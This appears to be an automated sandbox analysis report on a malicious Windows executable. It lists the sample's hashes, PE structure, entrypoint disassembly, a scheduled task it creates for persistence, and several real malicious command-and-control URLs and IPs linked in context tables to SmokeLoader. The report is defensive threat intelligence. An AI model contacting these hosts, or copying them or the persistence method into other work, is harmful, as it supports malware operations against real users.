https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	0%	URL Reputation	safe
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nwgrus.ru	189.161.95.103	true	true		unknown

Contacted URLs

Name	Malicious	Reputation
http://unicea.ws/tmp/index.php	true	unknown
http://nwgrus.ru/tmp/index.php	true	unknown
http://tech-servers.in.net/tmp/index.php	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/odirmr	explorer.exe, 00000001.00000000.1760930928.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.mi	explorer.exe, 00000001.00000000.1763031463.000000000982D000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000001.00000000.1760930928.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://powerpoint.office.comcember	explorer.exe, 00000001.00000000.1767121349.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1763031463.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://excel.office.com	explorer.exe, 00000001.00000000.1767121349.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	explorer.exe, 00000001.00000000.1762412862.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1764601072.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1761761015.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 00000001.00000000.1760930928.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/q	explorer.exe, 00000001.00000000.1763031463.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000001.00000000.1767121349.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1760930928.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://wns.windows.com/L	explorer.exe, 00000001.00000000.1767121349.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://word.office.com	explorer.exe, 00000001.00000000.1767121349.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000001.00000000.1760930928.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micr	explorer.exe, 00000001.00000000.1763031463.000000000982D000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://aka.ms/Vh5j3k	explorer.exe, 00000001.00000000.1760930928.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?&	explorer.exe, 00000001.00000000.1763031463.00000000096DF000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000001.00000000.1767121349.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 00000001.00000000.1760930928.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/	explorer.exe, 00000001.00000000.1763031463.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://outlook.com_	explorer.exe, 00000001.00000000.1767121349.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com:443/en-us/feed	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of	explorer.exe, 00000001.00000000.1760930928.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
58.151.148.90	unknown	Korea Republic of		17858	POWERVIS-AS-KRLGPOWERCOMMKR	true
189.161.95.103	nwgrus.ru	Mexico		8151	UninetSAdeCVMX	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1532852
Start date and time:	2024-10-14 01:51:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1HGXcC63iu.exe renamed because original name is a hash value
Original Sample Name:	8320df18fc9660f3a4dcaa29b3707847.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@2/2@3/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 38 Number of non-executed functions: 13
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 1HGXcC63iu.exe

Simulations

Behavior and APIs

Time	Type	Description
00:52:26	Task Scheduler	Run new task: Firefox Default Browser Agent 44001E79D4D76CAA path: C:\Users\user\AppData\Roaming\scjabht
19:52:26	API Interceptor	428054x Sleep call for process: explorer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
58.151.148.90	veEGy9FijY.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	oRKal761Qm.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	100xmargin.com/tmp/index.php
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
	n72I7qB2ss.exe	Get hash	malicious	SmokeLoader	Browse	mzxn.ru/tmp/index.php
	file.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
	cOm0MmeV34.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
	file.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	gebeus.ru/tmp/index.php
	2gQsoHaGEm.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	dbfhns.in/tmp/index.php
	QJqJic3hex.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	dbfhns.in/tmp/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
nwgrus.ru	K80v6DHFHE.exe	Get hash	malicious	SmokeLoader	Browse	148.230.249.9
	FyDBXJE74v.exe	Get hash	malicious	SmokeLoader	Browse	78.89.199.216
	file.exe	Get hash	malicious	SmokeLoader	Browse	63.143.98.185
	fTKQwp8fRa.exe	Get hash	malicious	SmokeLoader	Browse	78.89.199.216
	LgigaSKsL6.exe	Get hash	malicious	SmokeLoader	Browse	190.224.203.37
	file.exe	Get hash	malicious	SmokeLoader	Browse	190.147.128.172
	mGFoU1INUk.exe	Get hash	malicious	SmokeLoader	Browse	119.204.11.2
	uSIvID4Y7U.exe	Get hash	malicious	SmokeLoader	Browse	190.224.203.37
	wBgwzVbZuV.exe	Get hash	malicious	SmokeLoader	Browse	116.58.10.60
	bQ7r31F9Ow.exe	Get hash	malicious	SmokeLoader	Browse	190.147.2.86

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
POWERVIS-AS-KRLGPOWERCOMMKR	arm.elf	Get hash	malicious	Mirai, Moobot	Browse	125.186.137.226
	debug.dbg.elf	Get hash	malicious	Mirai, Moobot	Browse	180.227.248.35
	na.elf	Get hash	malicious	Mirai	Browse	115.136.128.86
	SecuriteInfo.com.Linux.Siggen.9999.5011.20467.elf	Get hash	malicious	Mirai	Browse	122.41.44.130
	YsI7t2OC5q.elf	Get hash	malicious	Mirai	Browse	58.148.206.11
	ULRmk7oYR7.elf	Get hash	malicious	Mirai	Browse	116.47.196.33
	na.elf	Get hash	malicious	Unknown	Browse	119.68.28.203
	na.elf	Get hash	malicious	Unknown	Browse	112.148.254.244
	na.elf	Get hash	malicious	Unknown	Browse	125.242.176.130
	na.elf	Get hash	malicious	Mirai	Browse	180.231.63.183
UninetSAdeCVMX	spc.elf	Get hash	malicious	Mirai, Moobot	Browse	201.126.250.101
	o5DbX8v3ZW.elf	Get hash	malicious	Mirai	Browse	200.64.188.89
	m0mg1WH7Su.elf	Get hash	malicious	Mirai	Browse	189.248.128.72
	YsI7t2OC5q.elf	Get hash	malicious	Mirai	Browse	201.136.108.169
	yQMBCvJVWp.elf	Get hash	malicious	Mirai	Browse	201.123.121.206
	na.elf	Get hash	malicious	Mirai	Browse	187.214.154.128
	GGXhCiYFBw.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	187.194.22.140
	uSIvID4Y7U.exe	Get hash	malicious	SmokeLoader	Browse	187.199.203.72
	na.elf	Get hash	malicious	Mirai	Browse	148.223.164.73
	na.elf	Get hash	malicious	Mirai	Browse	187.234.29.99

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	275456
Entropy (8bit):	5.751648146553764
Encrypted:	false
SSDEEP:	3072:O9PTmSohCYWK7JSuGdngqp7U+L5ACyxF9Dav3xvZtWluUCIqzpjAqMi:gYhcOIuGdngq58/4JZoluVIqzpjAqh
MD5:	8320DF18FC9660F3A4DCAA29B3707847
SHA1:	1EC0AFCCEAE9B6B0A771F28002B3617D45D5AB56
SHA-256:	CE39271335727CB252102E59F53DEDB8880FB3DCA8F597BDF7E5D35C6D605DE0
SHA-512:	A4A47B83FA644BB403CF2CF43CDA6357CE6149D874EE7549B6D0BA02E8BD31E3128F6546EA7ED1A225AC3DF70E3EB50848FDC859542C2F670F71F780A408017B
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 34%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................U.c......q......`.......v......E.....................a......d....Rich...................PE..L.....Xe.................j....s.....".............@...........................t.....8F......................................\...P....Pr..-...........................................................................................................text....i.......j.................. ..`.rdata...!......."...n..............@..@.data.....p.........................@....jekin...D....q..8..................@....zidisi..(... r..(..................@....rsrc....-...Pr.....................@..@................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\scjabht:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.751648146553764
TrID:	Win32 Executable (generic) a (10002005/4) 99.53% InstallShield setup (43055/19) 0.43% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	1HGXcC63iu.exe
File size:	275'456 bytes
MD5:	8320df18fc9660f3a4dcaa29b3707847
SHA1:	1ec0afcceae9b6b0a771f28002b3617d45d5ab56
SHA256:	ce39271335727cb252102e59f53dedb8880fb3dca8f597bdf7e5d35c6d605de0
SHA512:	a4a47b83fa644bb403cf2cf43cda6357ce6149d874ee7549b6d0ba02e8bd31e3128f6546ea7ed1a225ac3df70e3eb50848fdc859542c2f670f71f780a408017b
SSDEEP:	3072:O9PTmSohCYWK7JSuGdngqp7U+L5ACyxF9Dav3xvZtWluUCIqzpjAqMi:gYhcOIuGdngq58/4JZoluVIqzpjAqh
TLSH:	8444F68163A1AC13EFB64B324E39D9942A7EBC625E7572DFF104760F187B1A1E413B12
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................U.c.......q.......`.......v......E........................a.......d.....Rich....................PE..L.....Xe...

File Icon


Icon Hash:	17614cb2b24d2117

Static PE Info

General

Entrypoint:	0x401a22
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6558C78F [Sat Nov 18 14:17:51 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	dc51987737c4af4f71f5c3733cf2b1f2

Entrypoint Preview

Instruction
call 00007F8BAC8173D2h
jmp 00007F8BAC813C4Dh
mov edi, edi
push ebp
mov ebp, esp
sub esp, 00000328h
mov dword ptr [0041C650h], eax
mov dword ptr [0041C64Ch], ecx
mov dword ptr [0041C648h], edx
mov dword ptr [0041C644h], ebx
mov dword ptr [0041C640h], esi
mov dword ptr [0041C63Ch], edi
mov word ptr [0041C668h], ss
mov word ptr [0041C65Ch], cs
mov word ptr [0041C638h], ds
mov word ptr [0041C634h], es
mov word ptr [0041C630h], fs
mov word ptr [0041C62Ch], gs
pushfd
pop dword ptr [0041C660h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [0041C654h], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [0041C658h], eax
lea eax, dword ptr [ebp+08h]
mov dword ptr [0041C664h], eax
mov eax, dword ptr [ebp-00000320h]
mov dword ptr [0041C5A0h], 00010001h
mov eax, dword ptr [0041C658h]
mov dword ptr [0041C554h], eax
mov dword ptr [0041C548h], C0000409h
mov dword ptr [0041C54Ch], 00000001h
mov eax, dword ptr [0041B008h]
mov dword ptr [ebp-00000328h], eax
mov eax, dword ptr [0041B00Ch]
mov dword ptr [ebp-00000324h], eax
call dword ptr [000000D8h]

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1985c	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2725000	0x22dd0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x18000	0x19c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x169ef	0x16a00	5017a637cc335af03a6ec36cca92aac4	False	0.8069319751381215	data	7.517270263050042	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x18000	0x21b0	0x2200	8f7390606cfa5526c62a62295eb9b3af	False	0.37247242647058826	data	5.561090816497167	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1b000	0x270121c	0x1600	6d8a2d4cce703da056e9061551cb7a55	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.jekin	0x271d000	0x4400	0x3800	b211778b80f6d441b6cf61ada776fc6d	False	0.0025809151785714285	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.zidisi	0x2722000	0x2800	0x2800	1276481102f218c981e0324180bafd9f	False	0.00322265625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x2725000	0x22dd0	0x22e00	c0d08340b10908b7723d0d4308aa5d19	False	0.3799423163082437	data	4.837964295754695	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x273d678	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x273d7a8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_CURSOR	0x273fd78	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.7368421052631579
RT_CURSOR	0x273fea8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.06130705394190871
RT_ICON	0x2725b50	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.5674307036247335
RT_ICON	0x27269f8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.6376353790613718
RT_ICON	0x27272a0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.6849078341013825
RT_ICON	0x2727968	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.7456647398843931
RT_ICON	0x2727ed0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Turkish	Turkey	0.512863070539419
RT_ICON	0x272a478	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Turkish	Turkey	0.6137429643527205
RT_ICON	0x272b520	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Turkish	Turkey	0.6163934426229508
RT_ICON	0x272bea8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Turkish	Turkey	0.7553191489361702
RT_ICON	0x272c388	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.39952025586353945
RT_ICON	0x272d230	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.5
RT_ICON	0x272dad8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.5155529953917051
RT_ICON	0x272e1a0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.5635838150289018
RT_ICON	0x272e708	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Turkish	Turkey	0.35477178423236516
RT_ICON	0x2730cb0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Turkish	Turkey	0.3820356472795497
RT_ICON	0x2731d58	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Turkish	Turkey	0.40614754098360656
RT_ICON	0x27326e0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Turkish	Turkey	0.42021276595744683
RT_ICON	0x2732bc0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.39285714285714285
RT_ICON	0x2733a68	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5537003610108303
RT_ICON	0x2734310	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.6226958525345622
RT_ICON	0x27349d8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6372832369942196
RT_ICON	0x2734f40	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.425422138836773
RT_ICON	0x2735fe8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.4209016393442623
RT_ICON	0x2736970	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.46187943262411346
RT_ICON	0x2736e40	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.279317697228145
RT_ICON	0x2737ce8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.3664259927797834
RT_ICON	0x2738590	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.3773041474654378
RT_ICON	0x2738c58	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.3764450867052023
RT_ICON	0x27391c0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.2587136929460581
RT_ICON	0x273b768	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Turkish	Turkey	0.27345215759849906
RT_ICON	0x273c810	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.28852459016393445
RT_ICON	0x273d198	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.32180851063829785
RT_STRING	0x2742630	0xaa	data			0.5588235294117647
RT_STRING	0x27426e0	0x600	data			0.4361979166666667
RT_STRING	0x2742ce0	0x460	data			0.45
RT_STRING	0x2743140	0x64a	data			0.4360248447204969
RT_STRING	0x2743790	0x7b4	data			0.417342799188641
RT_STRING	0x2743f48	0x6d0	data			0.4294724770642202
